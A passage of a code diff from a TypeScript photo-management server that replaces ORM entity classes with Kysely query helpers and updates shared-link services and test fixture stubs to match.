SharedLinkSearchDto,
|
||||||
} from 'src/dtos/shared-link.dto';
|
} from 'src/dtos/shared-link.dto';
|
||||||
import { SharedLinkEntity } from 'src/entities/shared-link.entity';
|
|
||||||
import { Permission, SharedLinkType } from 'src/enum';
|
import { Permission, SharedLinkType } from 'src/enum';
|
||||||
import { BaseService } from 'src/services/base.service';
|
import { BaseService } from 'src/services/base.service';
|
||||||
import { getExternalDomain, OpenGraphTags } from 'src/utils/misc';
|
import { getExternalDomain, OpenGraphTags } from 'src/utils/misc';
|
||||||
@ -98,7 +98,7 @@ export class SharedLinkService extends BaseService {
|
|||||||
|
|
||||||
async remove(auth: AuthDto, id: string): Promise<void> {
|
async remove(auth: AuthDto, id: string): Promise<void> {
|
||||||
const sharedLink = await this.findOrFail(auth.user.id, id);
|
const sharedLink = await this.findOrFail(auth.user.id, id);
|
||||||
await this.sharedLinkRepository.remove(sharedLink);
|
await this.sharedLinkRepository.remove(sharedLink.id);
|
||||||
}
|
}
|
||||||
|
|
||||||
// TODO: replace `userId` with permissions and access control checks
|
// TODO: replace `userId` with permissions and access control checks
|
||||||
@ -182,7 +182,7 @@ export class SharedLinkService extends BaseService {
|
|||||||
const config = await this.getConfig({ withCache: true });
|
const config = await this.getConfig({ withCache: true });
|
||||||
const sharedLink = await this.findOrFail(auth.sharedLink.userId, auth.sharedLink.id);
|
const sharedLink = await this.findOrFail(auth.sharedLink.userId, auth.sharedLink.id);
|
||||||
const assetId = sharedLink.album?.albumThumbnailAssetId || sharedLink.assets[0]?.id;
|
const assetId = sharedLink.album?.albumThumbnailAssetId || sharedLink.assets[0]?.id;
|
||||||
const assetCount = sharedLink.assets.length > 0 ? sharedLink.assets.length : sharedLink.album?.assets.length || 0;
|
const assetCount = sharedLink.assets.length > 0 ? sharedLink.assets.length : sharedLink.album?.assets?.length || 0;
|
||||||
const imagePath = assetId
|
const imagePath = assetId
|
||||||
? `/api/assets/${assetId}/thumbnail?key=${sharedLink.key.toString('base64url')}`
|
? `/api/assets/${assetId}/thumbnail?key=${sharedLink.key.toString('base64url')}`
|
||||||
: '/feature-panel.png';
|
: '/feature-panel.png';
|
||||||
@ -194,11 +194,11 @@ export class SharedLinkService extends BaseService {
|
|||||||
};
|
};
|
||||||
}
|
}
|
||||||
|
|
||||||
private mapToSharedLink(sharedLink: SharedLinkEntity, { withExif }: { withExif: boolean }) {
|
private mapToSharedLink(sharedLink: SharedLink, { withExif }: { withExif: boolean }) {
|
||||||
return withExif ? mapSharedLink(sharedLink) : mapSharedLinkWithoutMetadata(sharedLink);
|
return withExif ? mapSharedLink(sharedLink) : mapSharedLinkWithoutMetadata(sharedLink);
|
||||||
}
|
}
|
||||||
|
|
||||||
private validateAndRefreshToken(sharedLink: SharedLinkEntity, dto: SharedLinkPasswordDto): string {
|
private validateAndRefreshToken(sharedLink: SharedLink, dto: SharedLinkPasswordDto): string {
|
||||||
const token = this.cryptoRepository.hashSha256(`${sharedLink.id}-${sharedLink.password}`);
|
const token = this.cryptoRepository.hashSha256(`${sharedLink.id}-${sharedLink.password}`);
|
||||||
const sharedLinkTokens = dto.token?.split(',') || [];
|
const sharedLinkTokens = dto.token?.split(',') || [];
|
||||||
if (sharedLink.password !== dto.password && !sharedLinkTokens.includes(token)) {
|
if (sharedLink.password !== dto.password && !sharedLinkTokens.includes(token)) {
|
||||||
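Note: the `validateAndRefreshToken` change above only swaps the parameter type from the old entity class to the `SharedLink` model; the token scheme itself is unchanged and is easiest to see in isolation. A minimal sketch, assuming `cryptoRepository.hashSha256` is a plain SHA-256 digest (the digest encoding here is an assumption) and using a hypothetical `validate` helper:

    import { createHash } from 'node:crypto';

    // Assumed stand-in for the service's cryptoRepository.hashSha256.
    const hashSha256 = (value: string) => createHash('sha256').update(value).digest('base64');

    // A client may present the raw password once, or any previously issued token
    // (comma-separated if it has collected several); either one unlocks the link.
    const validate = (link: { id: string; password: string | null }, dto: { password?: string; token?: string }) => {
      const token = hashSha256(`${link.id}-${link.password}`);
      const knownTokens = dto.token?.split(',') || [];
      if (link.password !== dto.password && !knownTokens.includes(token)) {
        throw new Error('Invalid password or token');
      }
      return token; // handed back to the client for subsequent requests
    };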
@@ -1,5 +1,4 @@
 import { mapAsset } from 'src/dtos/asset-response.dto';
-import { AssetEntity } from 'src/entities/asset.entity';
 import { SyncService } from 'src/services/sync.service';
 import { assetStub } from 'test/fixtures/asset.stub';
 import { authStub } from 'test/fixtures/auth.stub';
@@ -63,7 +62,7 @@ describe(SyncService.name, () => {
   it('should return a response requiring a full sync when there are too many changes', async () => {
     mocks.partner.getAll.mockResolvedValue([]);
     mocks.asset.getChangedDeltaSync.mockResolvedValue(
-      Array.from<AssetEntity>({ length: 10_000 }).fill(assetStub.image),
+      Array.from<typeof assetStub.image>({ length: 10_000 }).fill(assetStub.image),
    );
     await expect(
       sut.getDeltaSync(authStub.user1, { updatedAfter: new Date(), userIds: [authStub.user1.user.id] }),
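Note: with `AssetEntity` removed, the spec keeps the same bulk-fixture trick by inferring the element type from the stub itself. A sketch of the pattern (the element shape below is illustrative):

    // Array.from<T>({ length: n }) accepts a bare ArrayLike and yields n holes typed T;
    // .fill() then populates them, so no entity class is needed for the type argument.
    const stub = { id: 'asset-1' };
    const manyAssets = Array.from<typeof stub>({ length: 10_000 }).fill(stub);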
@@ -1,7 +1,6 @@
 import { Injectable } from '@nestjs/common';
 import { AssetResponseDto, mapAsset } from 'src/dtos/asset-response.dto';
 import { AuthDto } from 'src/dtos/auth.dto';
-import { AssetEntity } from 'src/entities/asset.entity';
 import { BaseService } from 'src/services/base.service';

 @Injectable()
@@ -12,6 +11,6 @@ export class ViewService extends BaseService {

   async getAssetsByOriginalPath(auth: AuthDto, path: string): Promise<AssetResponseDto[]> {
     const assets = await this.viewRepository.getAssetsByOriginalPath(auth.user.id, path);
-    return assets.map((asset) => mapAsset(asset as unknown as AssetEntity, { auth }));
+    return assets.map((asset) => mapAsset(asset, { auth }));
   }
 }
@@ -6,6 +6,13 @@ export const processTables: Processor = (builder, items) => {
   for (const {
     item: { options, object },
   } of items.filter((item) => item.type === 'table')) {
+    const test = readMetadata(object);
+    if (test) {
+      throw new Error(
+        `Table ${test.name} has already been registered. Does ${object.name} have two @Table() decorators?`,
+      );
+    }
+
     const tableName = options.name || asSnakeCase(object.name);

     writeMetadata(object, { name: tableName, options });
@@ -50,12 +50,8 @@ const asFunctionExpression = (options: FunctionOptions) => {
   }

   if ('body' in options) {
-    sql.push(
-      //
-      `AS $$`,
-      '  ' + options.body.trim(),
-      `$$;`,
-    );
+    const body = options.body;
+    sql.push(...(body.includes('\n') ? [`AS $$`, '  ' + body.trim(), `$$;`] : [`AS $$${body}$$;`]));
   }

   return sql.join('\n  ').trim();
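Note: the `asFunctionExpression` change above folds single-line SQL bodies onto one line instead of always emitting the three-line `AS $$ ... $$;` form. A standalone sketch of just that branch (helper name is hypothetical):

    // Single-line bodies are inlined; multi-line bodies keep the indented block form.
    const bodySql = (body: string): string[] =>
      body.includes('\n') ? [`AS $$`, '  ' + body.trim(), `$$;`] : [`AS $$${body}$$;`];

    bodySql('SELECT 1');                 // ['AS $$SELECT 1$$;']
    bodySql('BEGIN\n  RETURN 1;\nEND');  // ['AS $$', '  BEGIN\n  RETURN 1;\nEND', '$$;']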
@@ -13,11 +13,8 @@ import { PartnerRepository } from 'src/repositories/partner.repository';
 import { IBulkAsset, ImmichFile, UploadFile } from 'src/types';
 import { checkAccess } from 'src/utils/access';

-export const getAssetFile = <T extends { type: AssetFileType }>(
-  files: T[],
-  type: AssetFileType | GeneratedImageType,
-) => {
-  return (files || []).find((file) => file.type === type);
+export const getAssetFile = (files: AssetFile[], type: AssetFileType | GeneratedImageType) => {
+  return files.find((file) => file.type === type);
 };

 export const getAssetFiles = (files: AssetFile[]) => ({
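Note: the simplified `getAssetFile` drops both the generic parameter and the `files || []` guard, so callers now guarantee a concrete array. Hypothetical usage, with the `asset.files` shape assumed:

    // files is AssetFile[] (never null/undefined) after this change.
    const thumbnail = getAssetFile(asset.files, AssetFileType.THUMBNAIL);
    const preview = getAssetFile(asset.files, AssetFileType.PREVIEW);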
@@ -1,15 +1,24 @@
 import {
+  DeduplicateJoinsPlugin,
   Expression,
   ExpressionBuilder,
   ExpressionWrapper,
+  Kysely,
   KyselyConfig,
   Nullable,
   Selectable,
+  SelectQueryBuilder,
   Simplify,
   sql,
 } from 'kysely';
 import { PostgresJSDialect } from 'kysely-postgres-js';
+import { jsonArrayFrom, jsonObjectFrom } from 'kysely/helpers/postgres';
 import postgres, { Notice } from 'postgres';
+import { columns, Exif, Person } from 'src/database';
+import { DB } from 'src/db';
+import { AssetFileType } from 'src/enum';
+import { TimeBucketSize } from 'src/repositories/asset.repository';
+import { AssetSearchBuilderOptions } from 'src/repositories/search.repository';

 type Ssl = 'require' | 'allow' | 'prefer' | 'verify-full' | boolean | object;

@@ -112,3 +121,225 @@ export function toJson<DB, TB extends keyof DB & string, T extends TB | Expressi
   >
 >;
 }
+
+export const ASSET_CHECKSUM_CONSTRAINT = 'UQ_assets_owner_checksum';
+// TODO come up with a better query that only selects the fields we need
+
+export function withExif<O>(qb: SelectQueryBuilder<DB, 'assets', O>) {
+  return qb
+    .leftJoin('exif', 'assets.id', 'exif.assetId')
+    .select((eb) => eb.fn.toJson(eb.table('exif')).$castTo<Exif | null>().as('exifInfo'));
+}
+
+export function withExifInner<O>(qb: SelectQueryBuilder<DB, 'assets', O>) {
+  return qb
+    .innerJoin('exif', 'assets.id', 'exif.assetId')
+    .select((eb) => eb.fn.toJson(eb.table('exif')).$castTo<Exif>().as('exifInfo'));
+}
+
+export function withSmartSearch<O>(qb: SelectQueryBuilder<DB, 'assets', O>) {
+  return qb
+    .leftJoin('smart_search', 'assets.id', 'smart_search.assetId')
+    .select((eb) => toJson(eb, 'smart_search').as('smartSearch'));
+}
+
+export function withFaces(eb: ExpressionBuilder<DB, 'assets'>, withDeletedFace?: boolean) {
+  return jsonArrayFrom(
+    eb
+      .selectFrom('asset_faces')
+      .selectAll('asset_faces')
+      .whereRef('asset_faces.assetId', '=', 'assets.id')
+      .$if(!withDeletedFace, (qb) => qb.where('asset_faces.deletedAt', 'is', null)),
+  ).as('faces');
+}
+
+export function withFiles(eb: ExpressionBuilder<DB, 'assets'>, type?: AssetFileType) {
+  return jsonArrayFrom(
+    eb
+      .selectFrom('asset_files')
+      .select(columns.assetFiles)
+      .whereRef('asset_files.assetId', '=', 'assets.id')
+      .$if(!!type, (qb) => qb.where('asset_files.type', '=', type!)),
+  ).as('files');
+}
+
+export function withFacesAndPeople(eb: ExpressionBuilder<DB, 'assets'>, withDeletedFace?: boolean) {
+  return jsonArrayFrom(
+    eb
+      .selectFrom('asset_faces')
+      .leftJoinLateral(
+        (eb) =>
+          eb.selectFrom('person').selectAll('person').whereRef('asset_faces.personId', '=', 'person.id').as('person'),
+        (join) => join.onTrue(),
+      )
+      .selectAll('asset_faces')
+      .select((eb) => eb.table('person').$castTo<Person>().as('person'))
+      .whereRef('asset_faces.assetId', '=', 'assets.id')
+      .$if(!withDeletedFace, (qb) => qb.where('asset_faces.deletedAt', 'is', null)),
+  ).as('faces');
+}
+
+export function hasPeople<O>(qb: SelectQueryBuilder<DB, 'assets', O>, personIds: string[]) {
+  return qb.innerJoin(
+    (eb) =>
+      eb
+        .selectFrom('asset_faces')
+        .select('assetId')
+        .where('personId', '=', anyUuid(personIds!))
+        .where('deletedAt', 'is', null)
+        .groupBy('assetId')
+        .having((eb) => eb.fn.count('personId').distinct(), '=', personIds.length)
+        .as('has_people'),
+    (join) => join.onRef('has_people.assetId', '=', 'assets.id'),
+  );
+}
+
+export function hasTags<O>(qb: SelectQueryBuilder<DB, 'assets', O>, tagIds: string[]) {
+  return qb.innerJoin(
+    (eb) =>
+      eb
+        .selectFrom('tag_asset')
+        .select('assetsId')
+        .innerJoin('tags_closure', 'tag_asset.tagsId', 'tags_closure.id_descendant')
+        .where('tags_closure.id_ancestor', '=', anyUuid(tagIds))
+        .groupBy('assetsId')
+        .having((eb) => eb.fn.count('tags_closure.id_ancestor').distinct(), '>=', tagIds.length)
+        .as('has_tags'),
+    (join) => join.onRef('has_tags.assetsId', '=', 'assets.id'),
+  );
+}
+
+export function withOwner(eb: ExpressionBuilder<DB, 'assets'>) {
+  return jsonObjectFrom(eb.selectFrom('users').select(columns.user).whereRef('users.id', '=', 'assets.ownerId')).as(
+    'owner',
+  );
+}
+
+export function withLibrary(eb: ExpressionBuilder<DB, 'assets'>) {
+  return jsonObjectFrom(
+    eb.selectFrom('libraries').selectAll('libraries').whereRef('libraries.id', '=', 'assets.libraryId'),
+  ).as('library');
+}
+
+export function withTags(eb: ExpressionBuilder<DB, 'assets'>) {
+  return jsonArrayFrom(
+    eb
+      .selectFrom('tags')
+      .select(columns.tag)
+      .innerJoin('tag_asset', 'tags.id', 'tag_asset.tagsId')
+      .whereRef('assets.id', '=', 'tag_asset.assetsId'),
+  ).as('tags');
+}
+
+export function truncatedDate<O>(size: TimeBucketSize) {
+  return sql<O>`date_trunc(${size}, "localDateTime" at time zone 'UTC') at time zone 'UTC'`;
+}
+
+export function withTagId<O>(qb: SelectQueryBuilder<DB, 'assets', O>, tagId: string) {
+  return qb.where((eb) =>
+    eb.exists(
+      eb
+        .selectFrom('tags_closure')
+        .innerJoin('tag_asset', 'tag_asset.tagsId', 'tags_closure.id_descendant')
+        .whereRef('tag_asset.assetsId', '=', 'assets.id')
+        .where('tags_closure.id_ancestor', '=', tagId),
+    ),
+  );
+}
+
+const joinDeduplicationPlugin = new DeduplicateJoinsPlugin();
+/** TODO: This should only be used for search-related queries, not as a general purpose query builder */
+
+export function searchAssetBuilder(kysely: Kysely<DB>, options: AssetSearchBuilderOptions) {
+  options.isArchived ??= options.withArchived ? undefined : false;
+  options.withDeleted ||= !!(options.trashedAfter || options.trashedBefore || options.isOffline);
+  return kysely
+    .withPlugin(joinDeduplicationPlugin)
+    .selectFrom('assets')
+    .selectAll('assets')
+    .$if(!!options.tagIds && options.tagIds.length > 0, (qb) => hasTags(qb, options.tagIds!))
+    .$if(!!options.personIds && options.personIds.length > 0, (qb) => hasPeople(qb, options.personIds!))
+    .$if(!!options.createdBefore, (qb) => qb.where('assets.createdAt', '<=', options.createdBefore!))
+    .$if(!!options.createdAfter, (qb) => qb.where('assets.createdAt', '>=', options.createdAfter!))
+    .$if(!!options.updatedBefore, (qb) => qb.where('assets.updatedAt', '<=', options.updatedBefore!))
+    .$if(!!options.updatedAfter, (qb) => qb.where('assets.updatedAt', '>=', options.updatedAfter!))
+    .$if(!!options.trashedBefore, (qb) => qb.where('assets.deletedAt', '<=', options.trashedBefore!))
+    .$if(!!options.trashedAfter, (qb) => qb.where('assets.deletedAt', '>=', options.trashedAfter!))
+    .$if(!!options.takenBefore, (qb) => qb.where('assets.fileCreatedAt', '<=', options.takenBefore!))
+    .$if(!!options.takenAfter, (qb) => qb.where('assets.fileCreatedAt', '>=', options.takenAfter!))
+    .$if(options.city !== undefined, (qb) =>
+      qb
+        .innerJoin('exif', 'assets.id', 'exif.assetId')
+        .where('exif.city', options.city === null ? 'is' : '=', options.city!),
+    )
+    .$if(options.state !== undefined, (qb) =>
+      qb
+        .innerJoin('exif', 'assets.id', 'exif.assetId')
+        .where('exif.state', options.state === null ? 'is' : '=', options.state!),
+    )
+    .$if(options.country !== undefined, (qb) =>
+      qb
+        .innerJoin('exif', 'assets.id', 'exif.assetId')
+        .where('exif.country', options.country === null ? 'is' : '=', options.country!),
+    )
+    .$if(options.make !== undefined, (qb) =>
+      qb
+        .innerJoin('exif', 'assets.id', 'exif.assetId')
+        .where('exif.make', options.make === null ? 'is' : '=', options.make!),
+    )
+    .$if(options.model !== undefined, (qb) =>
+      qb
+        .innerJoin('exif', 'assets.id', 'exif.assetId')
+        .where('exif.model', options.model === null ? 'is' : '=', options.model!),
+    )
+    .$if(options.lensModel !== undefined, (qb) =>
+      qb
+        .innerJoin('exif', 'assets.id', 'exif.assetId')
+        .where('exif.lensModel', options.lensModel === null ? 'is' : '=', options.lensModel!),
+    )
+    .$if(options.rating !== undefined, (qb) =>
+      qb
+        .innerJoin('exif', 'assets.id', 'exif.assetId')
+        .where('exif.rating', options.rating === null ? 'is' : '=', options.rating!),
+    )
+    .$if(!!options.checksum, (qb) => qb.where('assets.checksum', '=', options.checksum!))
+    .$if(!!options.deviceAssetId, (qb) => qb.where('assets.deviceAssetId', '=', options.deviceAssetId!))
+    .$if(!!options.deviceId, (qb) => qb.where('assets.deviceId', '=', options.deviceId!))
+    .$if(!!options.id, (qb) => qb.where('assets.id', '=', asUuid(options.id!)))
+    .$if(!!options.libraryId, (qb) => qb.where('assets.libraryId', '=', asUuid(options.libraryId!)))
+    .$if(!!options.userIds, (qb) => qb.where('assets.ownerId', '=', anyUuid(options.userIds!)))
+    .$if(!!options.encodedVideoPath, (qb) => qb.where('assets.encodedVideoPath', '=', options.encodedVideoPath!))
+    .$if(!!options.originalPath, (qb) =>
+      qb.where(sql`f_unaccent(assets."originalPath")`, 'ilike', sql`'%' || f_unaccent(${options.originalPath}) || '%'`),
+    )
+    .$if(!!options.originalFileName, (qb) =>
+      qb.where(
+        sql`f_unaccent(assets."originalFileName")`,
+        'ilike',
+        sql`'%' || f_unaccent(${options.originalFileName}) || '%'`,
+      ),
+    )
+    .$if(!!options.description, (qb) =>
+      qb
+        .innerJoin('exif', 'assets.id', 'exif.assetId')
+        .where(sql`f_unaccent(exif.description)`, 'ilike', sql`'%' || f_unaccent(${options.description}) || '%'`),
+    )
+    .$if(!!options.type, (qb) => qb.where('assets.type', '=', options.type!))
+    .$if(options.isFavorite !== undefined, (qb) => qb.where('assets.isFavorite', '=', options.isFavorite!))
+    .$if(options.isOffline !== undefined, (qb) => qb.where('assets.isOffline', '=', options.isOffline!))
+    .$if(options.isVisible !== undefined, (qb) => qb.where('assets.isVisible', '=', options.isVisible!))
+    .$if(options.isArchived !== undefined, (qb) => qb.where('assets.isArchived', '=', options.isArchived!))
+    .$if(options.isEncoded !== undefined, (qb) =>
+      qb.where('assets.encodedVideoPath', options.isEncoded ? 'is not' : 'is', null),
+    )
+    .$if(options.isMotion !== undefined, (qb) =>
+      qb.where('assets.livePhotoVideoId', options.isMotion ? 'is not' : 'is', null),
+    )
+    .$if(!!options.isNotInAlbum, (qb) =>
+      qb.where((eb) =>
+        eb.not(eb.exists((eb) => eb.selectFrom('albums_assets_assets').whereRef('assetsId', '=', 'assets.id'))),
+      ),
+    )
+    .$if(!!options.withExif, withExifInner)
+    .$if(!!(options.withFaces || options.withPeople || options.personIds), (qb) => qb.select(withFacesAndPeople))
+    .$if(!options.withDeleted, (qb) => qb.where('assets.deletedAt', 'is', null));
+}
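Note: `searchAssetBuilder` returns an unexecuted Kysely query, so callers can layer ordering and paging on top before running it. A hypothetical call site as a sketch (`kysely` and `userId` assumed in scope; option names come from `AssetSearchBuilderOptions` above):

    const page = await searchAssetBuilder(kysely, {
      userIds: [userId],
      takenAfter: new Date('2024-01-01'),
      city: 'Oslo',
      withExif: true, // routed through withExifInner, so exifInfo is non-null on results
    })
      .orderBy('assets.fileCreatedAt', 'desc')
      .limit(100)
      .execute();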
22
server/test/fixtures/album.stub.ts
vendored
@@ -1,11 +1,10 @@
-import { AlbumEntity } from 'src/entities/album.entity';
 import { AlbumUserRole, AssetOrder } from 'src/enum';
 import { assetStub } from 'test/fixtures/asset.stub';
 import { authStub } from 'test/fixtures/auth.stub';
 import { userStub } from 'test/fixtures/user.stub';

 export const albumStub = {
-  empty: Object.freeze<AlbumEntity>({
+  empty: Object.freeze({
     id: 'album-1',
     albumName: 'Empty album',
     description: '',
@@ -21,8 +20,9 @@ export const albumStub = {
     albumUsers: [],
     isActivityEnabled: true,
     order: AssetOrder.DESC,
+    updateId: '42',
   }),
-  sharedWithUser: Object.freeze<AlbumEntity>({
+  sharedWithUser: Object.freeze({
     id: 'album-2',
     albumName: 'Empty album shared with user',
     description: '',
@@ -43,8 +43,9 @@ export const albumStub = {
     ],
     isActivityEnabled: true,
     order: AssetOrder.DESC,
+    updateId: '42',
   }),
-  sharedWithMultiple: Object.freeze<AlbumEntity>({
+  sharedWithMultiple: Object.freeze({
     id: 'album-3',
     albumName: 'Empty album shared with users',
     description: '',
@@ -69,8 +70,9 @@ export const albumStub = {
     ],
     isActivityEnabled: true,
     order: AssetOrder.DESC,
+    updateId: '42',
   }),
-  sharedWithAdmin: Object.freeze<AlbumEntity>({
+  sharedWithAdmin: Object.freeze({
     id: 'album-3',
     albumName: 'Empty album shared with admin',
     description: '',
@@ -91,8 +93,9 @@ export const albumStub = {
     ],
     isActivityEnabled: true,
     order: AssetOrder.DESC,
+    updateId: '42',
   }),
-  oneAsset: Object.freeze<AlbumEntity>({
+  oneAsset: Object.freeze({
     id: 'album-4',
     albumName: 'Album with one asset',
     description: '',
@@ -108,8 +111,9 @@ export const albumStub = {
     albumUsers: [],
     isActivityEnabled: true,
     order: AssetOrder.DESC,
+    updateId: '42',
   }),
-  twoAssets: Object.freeze<AlbumEntity>({
+  twoAssets: Object.freeze({
     id: 'album-4a',
     albumName: 'Album with two assets',
     description: '',
@@ -125,8 +129,9 @@ export const albumStub = {
     albumUsers: [],
     isActivityEnabled: true,
     order: AssetOrder.DESC,
+    updateId: '42',
   }),
-  emptyWithValidThumbnail: Object.freeze<AlbumEntity>({
+  emptyWithValidThumbnail: Object.freeze({
     id: 'album-5',
     albumName: 'Empty album with valid thumbnail',
     description: '',
@@ -142,5 +147,6 @@ export const albumStub = {
     albumUsers: [],
     isActivityEnabled: true,
     order: AssetOrder.DESC,
+    updateId: '42',
   }),
 };
93
server/test/fixtures/asset.stub.ts
vendored
@@ -1,5 +1,5 @@
-import { AssetFile, Exif } from 'src/database';
-import { AssetEntity } from 'src/entities/asset.entity';
+import { AssetFace, AssetFile, Exif } from 'src/database';
+import { MapAsset } from 'src/dtos/asset-response.dto';
 import { AssetFileType, AssetStatus, AssetType } from 'src/enum';
 import { StorageAsset } from 'src/types';
 import { authStub } from 'test/fixtures/auth.stub';
@@ -26,13 +26,15 @@ const fullsizeFile: AssetFile = {

 const files: AssetFile[] = [fullsizeFile, previewFile, thumbnailFile];

-export const stackStub = (stackId: string, assets: AssetEntity[]) => {
+export const stackStub = (stackId: string, assets: (MapAsset & { exifInfo: Exif })[]) => {
   return {
     id: stackId,
     assets,
     ownerId: assets[0].ownerId,
     primaryAsset: assets[0],
     primaryAssetId: assets[0].id,
+    createdAt: new Date('2023-02-23T05:06:29.716Z'),
+    updatedAt: new Date('2023-02-23T05:06:29.716Z'),
   };
 };

@@ -85,9 +87,12 @@ export const assetStub = {
     isExternal: false,
     duplicateId: null,
     isOffline: false,
+    libraryId: null,
+    stackId: null,
+    updateId: '42',
   }),

-  noWebpPath: Object.freeze<AssetEntity>({
+  noWebpPath: Object.freeze({
     id: 'asset-id',
     status: AssetStatus.ACTIVE,
     deviceAssetId: 'device-asset-id',
@@ -122,9 +127,12 @@ export const assetStub = {
     deletedAt: null,
     duplicateId: null,
     isOffline: false,
+    libraryId: null,
+    stackId: null,
+    updateId: '42',
   }),

-  noThumbhash: Object.freeze<AssetEntity>({
+  noThumbhash: Object.freeze({
     id: 'asset-id',
     status: AssetStatus.ACTIVE,
     deviceAssetId: 'device-asset-id',
@@ -156,6 +164,9 @@ export const assetStub = {
     deletedAt: null,
     duplicateId: null,
     isOffline: false,
+    libraryId: null,
+    stackId: null,
+    updateId: '42',
   }),

   primaryImage: Object.freeze({
@@ -195,12 +206,13 @@ export const assetStub = {
     } as Exif,
     stackId: 'stack-1',
     stack: stackStub('stack-1', [
-      { id: 'primary-asset-id' } as AssetEntity,
-      { id: 'stack-child-asset-1' } as AssetEntity,
-      { id: 'stack-child-asset-2' } as AssetEntity,
+      { id: 'primary-asset-id' } as MapAsset & { exifInfo: Exif },
+      { id: 'stack-child-asset-1' } as MapAsset & { exifInfo: Exif },
+      { id: 'stack-child-asset-2' } as MapAsset & { exifInfo: Exif },
     ]),
     duplicateId: null,
     isOffline: false,
+    updateId: '42',
     libraryId: null,
   }),

@@ -229,6 +241,9 @@ export const assetStub = {
     isExternal: false,
     livePhotoVideo: null,
     livePhotoVideoId: null,
+    updateId: 'foo',
+    libraryId: null,
+    stackId: null,
     sharedLinks: [],
     originalFileName: 'asset-id.jpg',
     faces: [],
@@ -241,10 +256,10 @@ export const assetStub = {
     } as Exif,
     duplicateId: null,
     isOffline: false,
-    libraryId: null,
+    stack: null,
   }),

-  trashed: Object.freeze<AssetEntity>({
+  trashed: Object.freeze({
     id: 'asset-id',
     deviceAssetId: 'device-asset-id',
     fileModifiedAt: new Date('2023-02-23T05:06:29.716Z'),
@@ -281,9 +296,12 @@ export const assetStub = {
     duplicateId: null,
     isOffline: false,
     status: AssetStatus.TRASHED,
+    libraryId: null,
+    stackId: null,
+    updateId: '42',
   }),

-  trashedOffline: Object.freeze<AssetEntity>({
+  trashedOffline: Object.freeze({
     id: 'asset-id',
     status: AssetStatus.ACTIVE,
     deviceAssetId: 'device-asset-id',
@@ -321,8 +339,10 @@ export const assetStub = {
     } as Exif,
     duplicateId: null,
     isOffline: true,
+    stackId: null,
+    updateId: '42',
   }),
-  archived: Object.freeze<AssetEntity>({
+  archived: Object.freeze({
     id: 'asset-id',
     status: AssetStatus.ACTIVE,
     deviceAssetId: 'device-asset-id',
@@ -359,9 +379,12 @@ export const assetStub = {
     } as Exif,
     duplicateId: null,
     isOffline: false,
+    libraryId: null,
+    stackId: null,
+    updateId: '42',
   }),

-  external: Object.freeze<AssetEntity>({
+  external: Object.freeze({
     id: 'asset-id',
     status: AssetStatus.ACTIVE,
     deviceAssetId: 'device-asset-id',
@@ -397,9 +420,12 @@ export const assetStub = {
     } as Exif,
     duplicateId: null,
     isOffline: false,
+    updateId: '42',
+    stackId: null,
+    stack: null,
   }),

-  image1: Object.freeze<AssetEntity>({
+  image1: Object.freeze({
     id: 'asset-id-1',
     status: AssetStatus.ACTIVE,
     deviceAssetId: 'device-asset-id',
@@ -434,9 +460,13 @@ export const assetStub = {
     } as Exif,
     duplicateId: null,
     isOffline: false,
+    updateId: '42',
+    stackId: null,
+    libraryId: null,
+    stack: null,
   }),

-  imageFrom2015: Object.freeze<AssetEntity>({
+  imageFrom2015: Object.freeze({
     id: 'asset-id-1',
     status: AssetStatus.ACTIVE,
     deviceAssetId: 'device-asset-id',
@@ -510,7 +540,9 @@ export const assetStub = {
     deletedAt: null,
     duplicateId: null,
     isOffline: false,
+    updateId: '42',
     libraryId: null,
+    stackId: null,
   }),

   livePhotoMotionAsset: Object.freeze({
@@ -527,7 +559,7 @@ export const assetStub = {
       timeZone: `America/New_York`,
     },
     libraryId: null,
-  } as AssetEntity & { libraryId: string | null; files: AssetFile[]; exifInfo: Exif }),
+  } as MapAsset & { faces: AssetFace[]; files: AssetFile[]; exifInfo: Exif }),

   livePhotoStillAsset: Object.freeze({
     id: 'live-photo-still-asset',
@@ -544,7 +576,8 @@ export const assetStub = {
       timeZone: `America/New_York`,
     },
     files,
-  } as AssetEntity & { libraryId: string | null }),
+    faces: [] as AssetFace[],
+  } as MapAsset & { faces: AssetFace[] }),

   livePhotoWithOriginalFileName: Object.freeze({
     id: 'live-photo-still-asset',
@@ -562,7 +595,8 @@ export const assetStub = {
       timeZone: `America/New_York`,
     },
     libraryId: null,
-  } as AssetEntity & { libraryId: string | null }),
+    faces: [] as AssetFace[],
+  } as MapAsset & { faces: AssetFace[] }),

   withLocation: Object.freeze({
     id: 'asset-with-favorite-id',
@@ -590,6 +624,9 @@ export const assetStub = {
     isVisible: true,
     livePhotoVideo: null,
     livePhotoVideoId: null,
+    updateId: 'foo',
+    libraryId: null,
+    stackId: null,
     sharedLinks: [],
     originalFileName: 'asset-id.ext',
     faces: [],
@@ -604,7 +641,7 @@ export const assetStub = {
     deletedAt: null,
     duplicateId: null,
     isOffline: false,
-    libraryId: null,
+    tags: [],
   }),

   sidecar: Object.freeze({
@@ -639,10 +676,12 @@ export const assetStub = {
     deletedAt: null,
     duplicateId: null,
     isOffline: false,
+    updateId: 'foo',
     libraryId: null,
+    stackId: null,
   }),

-  sidecarWithoutExt: Object.freeze<AssetEntity>({
+  sidecarWithoutExt: Object.freeze({
     id: 'asset-id',
     status: AssetStatus.ACTIVE,
     deviceAssetId: 'device-asset-id',
@@ -676,7 +715,7 @@ export const assetStub = {
     isOffline: false,
   }),

-  hasEncodedVideo: Object.freeze<AssetEntity>({
+  hasEncodedVideo: Object.freeze({
     id: 'asset-id',
     status: AssetStatus.ACTIVE,
     originalFileName: 'asset-id.ext',
@@ -711,9 +750,13 @@ export const assetStub = {
     deletedAt: null,
     duplicateId: null,
     isOffline: false,
+    updateId: '42',
+    libraryId: null,
+    stackId: null,
+    stack: null,
   }),

-  hasFileExtension: Object.freeze<AssetEntity>({
+  hasFileExtension: Object.freeze({
     id: 'asset-id',
     status: AssetStatus.ACTIVE,
     deviceAssetId: 'device-asset-id',
@@ -788,6 +831,9 @@ export const assetStub = {
     } as Exif,
     duplicateId: null,
     isOffline: false,
+    updateId: '42',
+    libraryId: null,
+    stackId: null,
   }),

   imageHif: Object.freeze({
@@ -827,5 +873,8 @@ export const assetStub = {
     } as Exif,
     duplicateId: null,
     isOffline: false,
+    updateId: '42',
+    libraryId: null,
+    stackId: null,
   }),
 };
9
server/test/fixtures/auth.stub.ts
vendored
@@ -1,6 +1,5 @@
 import { Session } from 'src/database';
 import { AuthDto } from 'src/dtos/auth.dto';
-import { SharedLinkEntity } from 'src/entities/shared-link.entity';

 const authUser = {
   admin: {
@@ -42,14 +41,16 @@ export const authStub = {
       id: 'token-id',
     } as Session,
   }),
